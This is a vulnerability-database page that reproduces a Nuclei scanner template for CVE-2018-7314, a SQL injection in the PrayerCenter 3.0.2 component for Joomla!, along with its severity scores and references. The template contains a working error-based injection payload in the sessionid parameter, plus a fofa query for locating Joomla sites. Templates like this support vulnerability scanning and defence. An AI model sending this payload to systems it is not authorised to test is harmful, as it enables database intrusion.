Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7314
HistoryApr 02, 2024 - 6:50 a.m.

Joomla! Component PrayerCenter 3.0.2 - SQL Injection

2024-04-0206:50:57
ProjectDiscovery
github.com
16
cve
cve2018
joomla
sqli
prayercenter
mlwebtechnologies
cvss
cwe-89
exploit-db
github
av:n
ac:l
pr:n
ui:n
s:u
c:h
i:h
a:h

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.2%

SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
id: CVE-2018-7314

info:
  name: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
  reference:
    - https://www.exploit-db.com/exploits/44160
    - https://github.com/jweny/pocassistdb
    - https://github.com/0ps/pocassistdb
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-7314
    cwe-id: CWE-89
    epss-score: 0.00282
    epss-percentile: 0.67968
    cpe: cpe:2.3:a:mlwebtechnologies:prayercenter:3.0.2:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: mlwebtechnologies
    product: prayercenter
    framework: joomla\!
    fofa-query:
      - app="Joomla!-网站安装"
      - app="joomla!-网站安装"
  tags: cve,cve2018,joomla,sqli,joomla\!,mlwebtechnologies
variables:
  num: "{{rand_int(800000000, 1000000000)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 490a00463044022013223ae52cb825068e64f3b321f3ef5f86cd073b7014161dc40db24c4390224a02205f135e1001fdf736739d63eeabdb0b908940f7be65599a41c3ead1cffff0966a:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

81.2%